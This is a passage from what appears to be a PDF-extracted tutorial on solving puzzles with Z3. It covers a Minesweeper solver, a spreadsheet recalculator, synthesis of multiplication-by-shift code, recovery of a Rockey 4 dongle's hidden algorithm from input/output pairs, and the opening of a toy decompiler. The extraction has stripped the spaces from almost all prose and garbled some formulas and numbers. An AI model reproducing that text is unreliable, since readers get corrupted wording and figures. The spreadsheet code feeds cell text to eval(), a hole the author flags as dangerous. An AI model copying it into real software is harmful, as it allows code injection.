row=7 col=9, unsat!
row=8 col=9, unsat!
26
ThesearecellswhereIcanclicksafely,soIdid:
Nowwehavemoreinformation,soweupdateinput:
known=[
"01110001?",
"01?100011",
"011100000",
"000000000",
"111110011",
"?11?1001?",
"???331011",
"?????2110",
"???????10"]
Irunitagain:
row=7 col=1, unsat!
row=7 col=2, unsat!
row=7 col=3, unsat!
row=8 col=3, unsat!
row=9 col=5, unsat!
row=9 col=6, unsat!
Iclickonthesecellsagain:
Iupdateitagain:
known=[
"01110001?",
"01?100011",
"011100000",
27
"000000000",
"111110011",
"?11?1001?",
"222331011",
"??2??2110",
"????22?10"]
row=8 col=2, unsat!
row=9 col=4, unsat!
Thisislastupdate:
known=[
"01110001?",
"01?100011",
"011100000",
"000000000",
"111110011",
"?11?1001?",
"222331011",
"?22??2110",
"???322?10"]
...lastresult:
row=9 col=1, unsat!
row=9 col=2, unsat!
Voila!
Thesourcecode: https://github.com/dennis714/SAT_SMT_article/blob/master/SMT/minesweeper/
minesweeper_solver.py .
28
SomediscussiononHN: https://news.ycombinator.com/item?id=13797375 .
Seealso: crackingMinesweeperusingSATsolver: 11.3.
5.12 Recalculating micro-spreadsheet using Z3Py
Thereisaniceexercise36: writeaprogramtorecalculatemicro-spreadsheet,likethisone:
1 0 B0+B2 A0*B0*C0
123 10 12 11
667 A0+B1 (C1*A0)*122 A3+C2
Asitturnsout,thoughoverkill,thiscanbesolvedusingZ3withlittleeffort:
#!/usr/bin/python
from z3 import *
import sys, re
# MS Excel or LibreOffice style.
# first top-left cell is A0, not A1
def coord_to_name(R, C):
return "ABCDEFGHIJKLMNOPQRSTUVWXYZ"[R]+str(C)
# open file and parse it as list of lists:
f=open(sys.argv[1],"r")
# filter(None, ...) to remove empty sublists:
ar=filter(None, [item.rstrip().split() for item in f.readlines()])
f.close()
WIDTH=len(ar[0])
HEIGHT=len(ar)
# cells{} is a dictionary with keys like "A0", "B9", etc:
cells={}
for R in range(HEIGHT):
for C in range(WIDTH):
name=coord_to_name(R, C)
cells[name]=Int(name)
s=Solver()
cur_R=0
cur_C=0
for row in ar:
for c in row:
# string like "A0+B2" becomes "cells["A0"]+cells["B2"]":
c=re.sub(r'([A-Z]{1}[0-9]+)', r'cells["\1"]', c)
st="cells[\"%s\"]==%s" % (coord_to_name(cur_R, cur_C), c)
# evaluate string. Z3Py expression is constructed at this step:
e=eval(st)
# add constraint:
s.add (e)
cur_C=cur_C+1
cur_R=cur_R+1
cur_C=0
result=str(s.check())
print result
if result=="sat":
m=s.model()
for r in range(HEIGHT):
for c in range(WIDTH):
sys.stdout.write (str(m[cells[coord_to_name(r, c)]])+"\t")
sys.stdout.write ("\n")
(https://github.com/dennis714/yurichev.com/blob/master/blog/spreadsheet/1.py )
Allwedoisjustcreatingpackofvariablesforeachcell,namedA0,B1,etc,ofintegertype. Allofthem
arestoredin cells[]dictionary. Keyisastring. Thenweparseallthestringsfromcells,andaddtolistof
constraintsA0=123(incaseofnumberincell)or A0=B1+C2(incaseofexpressionincell). Thereisaslight
preparation: stringlike A0+B2becomescells[”A0”]+cells[”B2”] .
36BlogpostinRussian: http://thesz.livejournal.com/280784.html
29
ThenthestringisevaluatedusingPython eval()method,whichishighlydangerous37:imagineifend-user
couldaddastringtocellotherthanexpression? Nevertheless,itservesourpurposeswell,becausethisisa
simplestwaytopassastringwithexpressionintoZ3.
Z3dothejobwithlittleeffort:
% python 1.py test1
sat
1 0 135 82041
123 10 12 11
667 11 1342 83383
5.12.1 Unsat core
Nowtheproblem: whatifthereiscirculardependency? Like:
1 0 B0+B2 A0*B0
123 10 12 11
C1+123 C0*123 A0*122 A3+C2
Twofirstcellsofthelastrow(C0andC1)arelinkedtoeachother. Ourprogramwilljusttells“unsat”,
meaning,itcouldn’tsatisfyallconstraintstogether.Wecan’tusethisaserrormessagereportedtoend-user,
becauseit’shighlyunfriendly.
However,wecanfetch unsatcore,i.e.,listofvariableswhichZ3findsconflicting.
...
s=Solver()
s.set(unsat_core=True)
...
# add constraint:
s.assert_and_track(e, coord_to_name(cur_R, cur_C))
...
if result=="sat":
...
else:
print s.unsat_core()
(https://github.com/dennis714/yurichev.com/blob/master/blog/spreadsheet/2.py )
Weshouldexplicitlyturnonunsatcoresupportanduse assert_and_track() insteadofadd()method,be-
causethisfeatureslowsdownthewholeprocess,andisturnedoffbydefault. Thatworks:
% python 2.py test_circular
unsat
[C0, C1]
Perhaps,thesevariablescouldberemovedfromthe2Darray,markedas unresolvedandthewholespread-
sheetcouldberecalculatedagain.
5.12.2 Stress test
Howtogeneratelargerandomspreadsheet? Whatwecando. First,createrandom DAG38,likethisone:
37http://stackoverflow.com/questions/1832940/is-using-eval-in-python-a-bad-practice
38Directedacyclicgraph
30
Figure6:RandomDAG
Arrowswillrepresentinformationflow.Soavertex(node)whichhasnoincomingarrowstoit(indegree=0),
canbesettoarandomnumber. Thenweusetopologicalsorttofinddependenciesbetweenvertices. Then
weassignspreadsheetcellnamestoeachvertex. Thenwegeneraterandomexpressionwithrandomoper-
ations/numbers/cellstoeachcell,withtheuseofinformationfromtopologicalsortedgraph.
WolframMathematica:
(* Utility functions *)
In[1]:= findSublistBeforeElementByValue[lst_,element_]:=lst[[ 1;;Position[lst, element][[1]][[1]]-1]]
(* Input in ∞1.. range. 1->A0, 2->A1, etc *)
In[2]:= vertexToName[x_,width_]:=StringJoin[FromCharacterCode[ToCharacterCode["A"][[1]]+Floor[(x-1)/width]],
ToString[Mod[(x-1),width]]]
In[3]:= randomNumberAsString[]:=ToString[RandomInteger[{1,1000}]]
In[4]:= interleaveListWithRandomNumbersAsStrings[lst_]:=Riffle[lst,Table[randomNumberAsString[],Length[lst]-1]]
(* We omit division operation because micro-spreadsheet evaluator can't handle division by zero *)
In[5]:= interleaveListWithRandomOperationsAsStrings[lst_]:=Riffle[lst,Table[RandomChoice[{"+","-","*"}],Length[
lst]-1]]
31
In[6]:= randomNonNumberExpression[g_,vertex_]:=StringJoin[interleaveListWithRandomOperationsAsStrings[
interleaveListWithRandomNumbersAsStrings[Map[vertexToName[#,WIDTH]&,pickRandomNonDependentVertices[g,vertex
]]]]]
In[7]:= pickRandomNonDependentVertices[g_,vertex_]:=DeleteDuplicates[RandomChoice[
findSublistBeforeElementByValue[TopologicalSort[g],vertex],RandomInteger[{1,5}]]]
In[8]:= assignNumberOrExpr[g_,vertex_]:=If[VertexInDegree[g,vertex]==0,randomNumberAsString[],
randomNonNumberExpression[g,vertex]]
(* Main part *)
(* Create random graph *)
In[21]:= WIDTH=7;HEIGHT=8;TOTAL=WIDTH*HEIGHT
Out[21]= 56
In[24]:= g=DirectedGraph[RandomGraph[BernoulliGraphDistribution[TOTAL,0.05]],"Acyclic"];
...
(* Generate random expressions and numbers *)
In[26]:= expressions=Map[assignNumberOrExpr[g,#]&,VertexList[g]];
(* Make 2D table of it *)
In[27]:= t=Partition[expressions,WIDTH];
(* Export as tab-separated values *)
In[28]:= Export["/home/dennis/1.txt",t,"TSV"]
Out[28]= /home/dennis/1.txt
In[29]:= Grid[t,Frame->All,Alignment->Left]
Hereisanoutputfrom Grid[]:
846 499 A3*913-H4 808 278 303 D1+579+B6
B4*860+D2 999 59 442 425 A5*163+B2+127*C2*927*D3*213+C1 583
G6*379-C3-436-C4-289+H6 972 804 D2 G5+108-F1*413-D3 B5 G4*981*D2
F2 E0 B6-731-D3+791+B4*92+C1 551 F4*922*C2+760*A6-992+B4-184-A4 B1-624-E3 F4+182+A4*940-E1+76*C1
519 G1*402+D1*107*G3-458*A1 D3 B4 B3*811-D3*345+E0 B5 H5
F5-531+B5-222*E4 9 B5+106*B6+600-B1 E3 A5+866*F6+695-A3*226+C6 F4*102*E4*998-H0 B1-616-G5+812-A5
C3-956*A5 G4*408-D3*290*B6-899*G5+400+F1 B2-701+H6 A3+782*A5+46-B3-731+C1 42 287 H0
B4-792*H4*407+F6-425-E1 D2 D3 F2-327*G4*35*E1 E1+376*A6-606*F6*554+C5 E3 F6*484+C1-114-H4-638-A3
Usingthisscript,Icangeneraterandomspreadsheetof 26500 = 13000cells,whichseemstobeprocessed
incoupleofseconds.
5.12.3 The files
Thefiles,includingMathematicanotebook: https://github.com/dennis714/yurichev.com/tree/master/
blog/spreadsheet .
6 Program synthesis
Programsynthesisisaprocessofautomaticprogramgeneration,inaccordancewithsomespecificgoals.
6.1 Synthesis of simple program using Z3 SMT-solver
Sometimes,multiplicationoperationcanbereplacedwithaseveraloperationsofshifting/addition/subtrac-
tion. Compilersdoso,becausepackofinstructionscanbeexecutedfaster.
Forexample,multiplicationby19isreplacedbyGCC5.4withpairofinstructions: lea edx, [eax+eax*8]
and
lea eax, [eax+edx*2] . Thisissometimesalsocalled“superoptimization”.
Let’sseeifwecanfindashortestpossibleinstructionspackforsomespecifiedmultiplier.
AsI’vealreadywroteonce,SMT-solvercanbeseenasasolverofhugesystemsofequations. Thetask
is to construct such system of equations, which, when solved, could produce a short program. I will use
electronicsanalogyhere,itcanmakethingsalittlesimpler.
Firstofall,whatourprogramwillbeconstingof? Therewillbe3operationsallowed: ADD/SUB/SHL.Only
registersallowedasoperands,exceptforthesecondoperandofSHL(whichcouldbein1..31range). Each
registerwillbeassignedonlyonce(asin SSA39).
39Staticsingleassignmentform
32
Andtherewillbesome“magicblock”,whichtakesallpreviousregisterstates,italsotakesoperationtype,
operandsandproducesavalueofnextregister’sstate.
op ------------+
op1_reg -----+ |
op2_reg ---+ | |
| | |
v v v
+---------------+
| |
registers -> | | -> new register's state
| |
+---------------+
Nowlet’stakealookonourschematicsontoplevel:
0 -> blk -> blk -> blk .. -> blk -> 0
1 -> blk -> blk -> blk .. -> blk -> multiplier
Eachblocktakespreviousstateofregistersandproducesnewstates. Therearetwochains. Firstchain
takes0asstateofR0attheverybeginning,andthechainissupposedtoproduce0attheend(sincezero
multipliedbyanyvalueisstillzero). Thesecondchaintakes1andmustproducemultiplierasthestateof
verylastregister(since1multipliedbymultipliermustequaltomultiplier).
Eachblockis“controlled”byoperationtype,operands,etc. Foreachcolumn,thereiseachownset.
Nowyoucanviewthesetwochainsastwoequations.Theultimategoalistofindsuchstateofalloperation
typesandoperands,sothefirstchainwillequalto0,andthesecondtomultiplier.
Let’salsotakealookinto“magicblock”inside:
op1_reg op
| v
v +-----+
registers ---> selector1 --> | ADD |
+ | SUB | ---> result
| | SHL |
+-> selector2 --> +-----+
^ ^
| |
op2_reg op2_imm
Eachselectorcanbeviewedasasimplemultipositionalswitch. IfoperationisSHL,avalueinrangeof
1..31isusedassecondoperand.
Soyoucanimaginethiselectriccircuitandyourgoalistoturnallswitchesinsuchastate,sotwochains
willhave0andmultiplieronoutput. Thissoundslikelogicpuzzleinsomeway. NowwewilltrytouseZ3to
solvethispuzzle.
First,wedefineallvaribles:
R=[[BitVec('S_s%d_c%d' % (s, c), 32) for s in range(MAX_STEPS)] for c in range (CHAINS)]
op=[Int('op_s%d' % s) for s in range(MAX_STEPS)]
op1_reg=[Int('op1_reg_s%d' % s) for s in range(MAX_STEPS)]
op2_reg=[Int('op2_reg_s%d' % s) for s in range(MAX_STEPS)]
op2_imm=[BitVec('op2_imm_s%d' % s, 32) for s in range(MAX_STEPS)]
R[][]isregistersstateforeachchainandeachstep.
Oncontrary, op/op1_reg/op2_reg/op2_immvariablesaredefinedforeachstep,butforbothchains,since
bothchainsateachcolumnhasthesameoperation/operands.
Nowwemustlimitcountofoperations,andalso,register’snumberforeachstepmustnotbebiggerthan
stepnumber,inotherwords,instructionateachstepisallowedtoaccessonlyregisterswhichwerealready
setbefore:
for s in range(1, STEPS):
# for each step
sl.add(And(op[s]>=0, op[s]<=2))
sl.add(And(op1_reg[s]>=0, op1_reg[s]<s))
sl.add(And(op2_reg[s]>=0, op2_reg[s]<s))
sl.add(And(op2_imm[s]>=1, op2_imm[s]<=31))
Fixregisteroffirststepforbothchains:
for c in range(CHAINS):
# for each chain:
33
sl.add(R[c][0]==chain_inputs[c])
sl.add(R[c][STEPS-1]==chain_inputs[c]*multiplier)
Nowlet’sadd“magicblocks”:
for s in range(1, STEPS):
sl.add(R[c][s]==simulate_op(R,c, op[s], op1_reg[s], op2_reg[s], op2_imm[s]))
Nowhow“magicblock”isdefined?
def selector(R, c, s):
# for all MAX_STEPS:
return If(s==0, R[c][0],
If(s==1, R[c][1],
If(s==2, R[c][2],
If(s==3, R[c][3],
If(s==4, R[c][4],
If(s==5, R[c][5],
If(s==6, R[c][6],
If(s==7, R[c][7],
If(s==8, R[c][8],
If(s==9, R[c][9],
0)))))))))) # default
def simulate_op(R, c, op, op1_reg, op2_reg, op2_imm):
op1_val=selector(R,c,op1_reg)
return If(op==0, op1_val + selector(R, c, op2_reg),
If(op==1, op1_val - selector(R, c, op2_reg),
If(op==2, op1_val << op2_imm,
0))) # default
Thisisveryimportanttounderstand: iftheoperationisADD/SUB, op2_imm’svalueisjustignored. Oth-
erwise,ifoperationisSHL,valueof op2_regisignored. Justlikeincaseofdigitalcircuit.
Thecode: https://github.com/dennis714/SAT_SMT_article/blob/master/pgm_synth/mult.py .
Nowlet’sseehowitworks:
% ./mult.py 12
multiplier= 12
attempt, STEPS= 2
unsat
attempt, STEPS= 3
unsat
attempt, STEPS= 4
sat!
r1=SHL r0, 2
r2=SHL r1, 1
r3=ADD r1, r2
tests are OK
Thefirststepisalwaysastepcontaining0/1, or, r0. Sowhenoursolverreportingabout4steps, this
means3instructions.
Somethingharder:
% ./mult.py 123
multiplier= 123
attempt, STEPS= 2
unsat
attempt, STEPS= 3
unsat
attempt, STEPS= 4
unsat
attempt, STEPS= 5
sat!
r1=SHL r0, 2
r2=SHL r1, 5
r3=SUB r2, r1
r4=SUB r3, r0
tests are OK
Nowthecodemultiplyingby1234:
r1=SHL r0, 6
r2=ADD r0, r1
r3=ADD r2, r1
34
r4=SHL r2, 4
r5=ADD r2, r3
r6=ADD r5, r4
Looksgreat,butittook 23secondstofinditonmyIntelXeonCPUE31220@3.10GHz. Iagree,this
is far from practical usage. Also, I’m not quite sure that this piece of code will work faster than a single
multiplicationinstruction. Butanyway,it’sagooddemonstrationofSMTsolverscapabilities.
Thecodemultiplyingby12345( 150seconds):
r1=SHL r0, 5
r2=SHL r0, 3
r3=SUB r2, r1
r4=SUB r1, r3
r5=SHL r3, 9
r6=SUB r4, r5
r7=ADD r0, r6
Multiplicationby123456( 8minutes!):
r1=SHL r0, 9
r2=SHL r0, 13
r3=SHL r0, 2
r4=SUB r1, r2
r5=SUB r3, r4
r6=SHL r5, 4
r7=ADD r1, r6
6.1.1 Few notes
I’veremovedSHRinstructionsupport,simplybecausethecodemultiplyingbyaconstantmakesnouseofit.
Evenmore: it’snotaproblemtoaddsupportofconstantsassecondoperandforallinstructions,butagain,
youwouldn’tfindapieceofcodewhichdoesthisjobandusessomeadditionalconstants.OrmaybeIwrong?
Ofcourse,foranotherjobyou’llneedtoaddsupportofconstantsandotheroperations. Butatthesame
time,itwillworkslowerandslower. SoIhadtokeep ISA40ofthistoyCPU41ascompactaspossible.
6.1.2 The code
https://github.com/dennis714/SAT_SMT_article/blob/master/pgm_synth/mult.py .
6.2 Rockey dongle: finding unknown algorithm using only input/output pairs
(ThistextwasfirstpublishedinAugust2012inmyblog: http://blog.yurichev.com/node/71 .)
SomesmartcardscanexecuteJavaor.NETcode-that’sthewaytohideyoursensitivealgorithmintochip
thatisveryhardtobreak(decapsulate). Forexample,onemayencrypt/decryptdatafilesbyhiddencrypto
algorithmrenderingsoftwarepiracyofsuchsoftwareclosetoimpossible—anencrypteddatefilecreatedon
softwarewithconnectedsmartcardwouldbeimpossibletodecryptoncrackedversionofthesamesoftware.
(Thisleadstomanynuisances,though.)
That’swhatcalled blackbox.
Somesoftwareprotectiondonglesoffersthisfunctionalitytoo. OneexampleisRockey442.
40InstructionSetArchitecture
41Centralprocessingunit
42http://www.rockey.nl/en/rockey.html
35
Figure7:Rockey4dongle
ThisisasmalldongleconnectedviaUSB.Iscontainsomeuser-definedmemorybutalsomemoryforuser
algorithms.
Thevirtual(toy)CPUforthesealgorithmsisverysimple: itofferonly816-bitregisters(however,only4
canbesetandread)and8operations(addition,subtractation,cyclicleftshifting,multiplication,OR,XOR,
AND,negation).
Secondinstructionargumentcanbeaconstant(from0to63)insteadofregister.
Eachalgorithmisdescribedbystringlike
A=A+B, B=C*13, D=DˆA, C=B*55, C=C&A, D=D|A, A=A*9, A=A&B .
Therearenomemory,stack,conditional/unconditionaljumps,etc.
Eachalgorithm,obviously,can’thavesideeffects,sotheyareactually purefunctions andtheirresults
canbememoized.
Bytheway,asithasbeenmentionedinRockey4manual,firstandlastinstructioncannothaveconstants.
Maybethat’sbecausethesefieldsusedforsomeinternaldata:eachalgorithmstartandendshouldbemarked
somehowinternallyanyway.
Woulditbepossibletorevealhiddenimpossible-to-readalgorithmonlybyrecordinginput/outputdongle
traffic? Commonsensetellus“no”. Butwecantryanyway.
Since,mygoalwasn’ttobreakintosomeRockey-protectedsoftware,Iwasinterestingonlyinlimits(which
algorithmscouldwefind),soImakesomethingssimpler:wewillworkwithonly416-bitregisters,andthere
willbeonly6operations(add,subtract,multiply,OR,XOR,AND).
Let’sfirstcalculate,howmuchinformationwillbeusedinbrute-forcecase.
Thereare384ofallpossibleinstructionsin reg=reg,op,reg formatfor4registersand6operations,and
also6144instructionsin reg=reg,op,constant format. Rememberthatconstantlimitedto63asmaximal
value? Thathelpusforalittle.
So,thereare6528ofallpossibleinstructions. Thismean,thereare 1:110195-instructionalgorithms.
That’stoomuch.
Howcanweexpresseachinstructionassystemofequations? Whilerememberingsomeschoolmathe-
matics,Iwrotethis:
Function one\_step()=
# Each Bx is integer, but may be only 0 or 1.
# only one of B1..B4 and B5..B9 can be set
reg1=B1*A + B2*B + B3*C + B4*D
reg_or_constant2=B5*A + B6*B + B7*C + B8*D + B9*constant
reg1 should not be equal to reg_or_constant2
# Only one of B10..B15 can be set
result=result+B10*(reg1*reg2)
result=result+B11*(reg1^reg2)
result=result+B12*(reg1+reg2)
result=result+B13*(reg1-reg2)
result=result+B14*(reg1|reg2)
result=result+B15*(reg1&reg2)
B16 - true if register isn't updated in this part
B17 - true if register is updated in this part
(B16 cannot be equal to B17)
A=B16*A + B17*result
B=B18*A + B19*result
C=B20*A + B21*result
36
D=B22*A + B23*result
That’showwecanexpresseachinstructioninalgorithm.
5-instructionsalgorithmcanbeexpressedlikethis:
one_step (one_step (one_step (one_step (one_step (input_registers))))) .
Let’salsoaddfiveknowninput/outputpairsandwe’llgetsystemofequationslikethis:
one_step (one_step (one_step (one_step (one_step (input_1)))))==output_1
one_step (one_step (one_step (one_step (one_step (input_2)))))==output_2
one_step (one_step (one_step (one_step (one_step (input_3)))))==output_3
one_step (one_step (one_step (one_step (one_step (input_4)))))==output_4
.. etc
Sothequestionnowistofind 523booleanvaluessatisfyingknowninput/outputpairs.
IwrotesmallutilitytoprobeRockey4algorithmwithrandomnumbers,itproduceresultsinform:
RY_CALCULATE1: (input) p1=30760 p2=18484 p3=41200 p4=61741 (output) p1=49244 p2=11312 p3=27587 p4=12657
RY_CALCULATE1: (input) p1=51139 p2=7852 p3=53038 p4=49378 (output) p1=58991 p2=34134 p3=40662 p4=9869
RY_CALCULATE1: (input) p1=60086 p2=52001 p3=13352 p4=45313 (output) p1=46551 p2=42504 p3=61472 p4=1238
RY_CALCULATE1: (input) p1=48318 p2=6531 p3=51997 p4=30907 (output) p1=54849 p2=20601 p3=31271 p4=44794
p1/p2/p3/p4arejustanothernamesforA/B/C/Dregisters.
Nowlet’sstartwithZ3. WewillneedtoexpressRockey4toyCPUinZ3Py(Z3Python API)terms.
Itcanbesaid,myPythonscriptisdividedintotwoparts:
•constraintdefinitions(like, output_1shouldbe nforinput_1=m ,constantcannotbegreaterthan63 ,
etc);
•functionsconstructingsystemofequations.
Thispieceofcodedefinesomekindof structureconsistingof4named16-bitvariables,eachrepresent
registerinourtoyCPU.
Registers_State=Datatype ('Registers_State')
Registers_State.declare('cons', ('A', BitVecSort(16)), ('B', BitVecSort(16)), ('C', BitVecSort(16)), ('D',
BitVecSort(16)))
Registers_State=Registers_State.create()
Theseenumerationsdefinetwonewtypes(or sortsinZ3’sterminology):
Operation, (OP_MULT, OP_MINUS, OP_PLUS, OP_XOR, OP_OR, OP_AND) = EnumSort('Operation', ('OP_MULT', 'OP_MINUS', '
OP_PLUS', 'OP_XOR', 'OP_OR', 'OP_AND'))
Register, (A, B, C, D) = EnumSort('Register', ('A', 'B', 'C', 'D'))
Thispartisveryimportant,itdefinesallvariablesinoursystemofequations. op_stepistypeofoperation
ininstruction. reg_or_constant isselectorbetweenregisterandconstantinsecondargument— Falseifit’s
aregisterand Trueifit’saconstant. reg_stepisadestinationregisterofthisinstruction. reg1_stepand
reg2_steparejustregistersatarg1andarg2. constant_step isconstant(incaseit’susedininstruction
insteadofarg2).
op_step=[Const('op_step%s' % i, Operation) for i in range(STEPS)]
reg_or_constant_step=[Bool('reg_or_constant_step%s' % i) for i in range(STEPS)]
reg_step=[Const('reg_step%s' % i, Register) for i in range(STEPS)]
reg1_step=[Const('reg1_step%s' % i, Register) for i in range(STEPS)]
reg2_step=[Const('reg2_step%s' % i, Register) for i in range(STEPS)]
constant_step = [BitVec('constant_step%s' % i, 16) for i in range(STEPS)]
Addingconstraintsisverysimple. Remember,Iwrotethateachconstantcannotbelargerthan63?
# according to Rockey 4 dongle manual, arg2 in first and last instructions cannot be a constant
s.add (reg_or_constant_step[0]==False)
s.add (reg_or_constant_step[STEPS-1]==False)
...
for x in range(STEPS):
s.add (constant_step[x]>=0, constant_step[x]<=63)
37
Knowninput/outputvaluesareaddedasconstraintstoo.
Nowlet’sseehowtoconstructoursystemofequations:
# Register, Registers_State -> int
def register_selector (register, input_registers):
return If(register==A, Registers_State.A(input_registers),
If(register==B, Registers_State.B(input_registers),
If(register==C, Registers_State.C(input_registers),
If(register==D, Registers_State.D(input_registers),
0)))) # default
Thisfunctionreturningcorrespondingregistervaluefrom structure. Needlesstosay,thecodeaboveis
notexecuted. If()isZ3Pyfunction. Thecodeonlydeclaresthefunction,whichwillbeusedinanother.
ExpressiondeclarationresemblingLISP PLinsomeway.
Hereisanotherfunctionwhere register_selector() isused:
# Bool, Register, Registers_State, int -> int
def register_or_constant_selector (register_or_constant, register, input_registers, constant):
return If(register_or_constant==False, register_selector(register, input_registers), constant)
Thecodehereisneverexecutedtoo. Itonlyconstructsonesmallpieceofverybigexpression. Butfor
thesakeofsimplicity,onecanthinkallthesefunctionswillbecalledduringbruteforcesearch,manytimes,
atfastestpossiblespeed.
# Operation, Bool, Register, Register, Int, Registers_State -> int
def one_op (op, register_or_constant, reg1, reg2, constant, input_registers):
arg1=register_selector(reg1, input_registers)
arg2=register_or_constant_selector (register_or_constant, reg2, input_registers, constant)
return If(op==OP_MULT, arg1*arg2,
If(op==OP_MINUS, arg1-arg2,
If(op==OP_PLUS, arg1+arg2,
If(op==OP_XOR, arg1^arg2,
If(op==OP_OR, arg1|arg2,
If(op==OP_AND, arg1&arg2,
0)))))) # default
Hereistheexpressiondescribingeachinstruction. new_valwillbeassignedtodestinationregister,while
allotherregisters’valuesarecopiedfrominputregisters’state:
# Bool, Register, Operation, Register, Register, Int, Registers_State -> Registers_State
def one_step (register_or_constant, register_assigned_in_this_step, op, reg1, reg2, constant, input_registers):
new_val=one_op(op, register_or_constant, reg1, reg2, constant, input_registers)
return If (register_assigned_in_this_step==A, Registers_State.cons (new_val,
Registers_State.B(input_registers),
Registers_State.C(input_registers),
Registers_State.D(input_registers)),
If (register_assigned_in_this_step==B, Registers_State.cons (Registers_State.A(input_registers),
new_val,
Registers_State.C(input_registers),
Registers_State.D(input_registers)),
If (register_assigned_in_this_step==C, Registers_State.cons (Registers_State.A(input_registers),
Registers_State.B(input_registers),
new_val,
Registers_State.D(input_registers)),
If (register_assigned_in_this_step==D, Registers_State.cons (Registers_State.A(input_registers),
Registers_State.B(input_registers),
Registers_State.C(input_registers),
new_val),
Registers_State.cons(0,0,0,0))))) # default
Thisisthelastfunctiondescribingawhole n-stepprogram:
def program(input_registers, STEPS):
cur_input=input_registers
for x in range(STEPS):
cur_input=one_step (reg_or_constant_step[x], reg_step[x], op_step[x], reg1_step[x], reg2_step[x],
constant_step[x], cur_input)
return cur_input
Again,forthesakeofsimplicity,itcanbesaid,nowZ3willtryeachpossibleregisters/operations/constants
againstthisexpressiontofindsuchcombinationwhichsatisfyallinput/outputpairs. Soundsabsurdic,but
thisisclosetoreality. SAT/SMT-solversindeedtriesthemall. Butthetrickistoprunesearchtreeasearlyas
possible,soitwillworkforsomereasonabletime. Andthisishardestproblemforsolvers.
38
Nowlet’sstartwithverysimple3-stepalgorithm: B=AˆD, C=D*D, D=A*C . Pleasenote: register Aleft
unchanged. IprogrammedRockey4donglewiththealgorithm,andrecordedalgorithmoutputsare:
RY_CALCULATE1: (input) p1=8803 p2=59946 p3=36002 p4=44743 (output) p1=8803 p2=36004 p3=7857 p4=24691
RY_CALCULATE1: (input) p1=5814 p2=55512 p3=52155 p4=55813 (output) p1=5814 p2=52403 p3=33817 p4=4038
RY_CALCULATE1: (input) p1=25206 p2=2097 p3=55906 p4=22705 (output) p1=25206 p2=15047 p3=10849 p4=43702
RY_CALCULATE1: (input) p1=10044 p2=14647 p3=27923 p4=7325 (output) p1=10044 p2=15265 p3=47177 p4=20508
RY_CALCULATE1: (input) p1=15267 p2=2690 p3=47355 p4=56073 (output) p1=15267 p2=57514 p3=26193 p4=53395
Ittookaboutonesecondandonly5pairsabovetofindalgorithm(onmyquad-coreXeonE3-12203.1GHz,
however,Z3solverworkinginsingle-threadmode):
B = A ^ D
C = D * D
D = C * A
Notethelastinstruction: Cand AregistersareswappedcomparingtoversionIwrotebyhand. Butof
course,thisinstructionisworkinginthesameway,becausemultiplicationiscommutativeoperation.
NowifItrytofind4-stepprogramsatisfyingtothesevalues,myscriptwillofferthis:
B = A ^ D
C = D * D
D = A * C
A = A | A
...andthat’sreallyfun,becausethelastinstructiondonothingwithvalueinregister A,it’slikeNOP43—but
still,algorithmiscorrectforallvaluesgiven.
Hereisanother5-stepalgorithm: B=BˆD, C=A*22, A=B*19, A=A&42, D=B&C andvalues:
RY_CALCULATE1: (input) p1=61876 p2=28737 p3=28636 p4=50362 (output) p1=32 p2=46331 p3=50552 p4=33912
RY_CALCULATE1: (input) p1=46843 p2=43355 p3=39078 p4=24552 (output) p1=8 p2=63155 p3=47506 p4=45202
RY_CALCULATE1: (input) p1=22425 p2=51432 p3=40836 p4=14260 (output) p1=0 p2=65372 p3=34598 p4=34564
RY_CALCULATE1: (input) p1=44214 p2=45766 p3=19778 p4=59924 (output) p1=2 p2=22738 p3=55204 p4=20608
RY_CALCULATE1: (input) p1=27348 p2=49060 p3=31736 p4=59576 (output) p1=0 p2=22300 p3=11832 p4=1560
Ittook37secondsandwe’vegot:
B = D ^ B
C = A * 22
A = B * 19
A = A & 42
D = C & B
A=A&42wascorrectlydeduced(lookatthesefivep1’satoutput(assignedtooutput Aregister):32,8,0,2,0)
6-stepalgorithm A=A+B, B=C*13, D=DˆA, C=C&A, D=D|B, A=A&B andvalues:
RY_CALCULATE1: (input) p1=4110 p2=35411 p3=54308 p4=47077 (output) p1=32832 p2=50644 p3=36896 p4=60884
RY_CALCULATE1: (input) p1=12038 p2=7312 p3=39626 p4=47017 (output) p1=18434 p2=56386 p3=2690 p4=64639
RY_CALCULATE1: (input) p1=48763 p2=27663 p3=12485 p4=20563 (output) p1=10752 p2=31233 p3=8320 p4=31449
RY_CALCULATE1: (input) p1=33174 p2=38937 p3=54005 p4=38871 (output) p1=4129 p2=46705 p3=4261 p4=48761
RY_CALCULATE1: (input) p1=46587 p2=36275 p3=6090 p4=63976 (output) p1=258 p2=13634 p3=906 p4=48966
90secondsandwe’vegot:
A = A + B
B = C * 13
D = D ^ A
D = B | D
C = C & A
A = B & A
Butthatwassimple,however. Some6-stepalgorithmsarenotpossibletofind,forexample:
A=AˆB, A=A*9, A=AˆC, A=A*19, A=AˆD, A=A&B . Solverwasworkingtoolong(uptoseveralhours),soI
didn’tevenknowisitpossibletofinditanyway.
6.2.1 Conclusion
Thisisinfactanexerciseinprogramsynthesis.
Someshortalgorithmsfortiny CPUsarereallypossibletofindusingsosmallsetsetofdata. Ofcourse
it’sstillnotpossibletorevealsomecomplexalgorithm,butthismethoddefinitelyshouldnotbeignored.
43NoOperation
39
6.2.2 The files
Rockey4dongleprogrammerandreader,Rockey4manual,Z3Pyscriptforfindingalgorithms,input/output
pairs: https://github.com/dennis714/SAT_SMT_article/tree/master/pgm_synth/rockey_files .
6.2.3 Further work
Perhaps,constructingLISP-likeS-expressioncanbebetterthanaprogramfortoy-levelCPU.
It’salsopossibletostartwithsmallerconstantsandthenproceedtobigger. Thisissomewhatsimilarto
increasingpasswordlengthinpasswordbrute-forcecracking.
7 Toy decompiler
7.1 Introduction
Amodern-daycompilerisaproductofhundredsofdeveloper/year. Atthesametime,toycompilercanbe
anexerciseforastudentforaweek(orevenweekend).
Likewise,commercialdecompilerlikeHex-Rayscanbeextremelycomplex,whiletoydecompilerlikethis
one,canbeeasytounderstandandremake.
ThefollowingdecompilerwritteninPython,supportsonlyshortbasicblocks,withnojumps. Memoryis
alsonotsupported.
7.2 Data structure
Ourtoydecompilerwillusejustonesingledatastructure,representingexpressiontree.
ManyprogrammingtextbookshasanexampleofconversionfromFahrenheittemperaturetoCelsius,using
thefollowingformula:
celsius = (fahrenheit  32)5
9
Thisexpressioncanberepresentedasatree:
/
*
-
INPUT
 32
5
9
Howtostoreitinmemory? Weseehere3typesofnodes: 1)numbers(orvalues);2)arithmeticalopera-
tions;3)symbols(like“INPUT”).
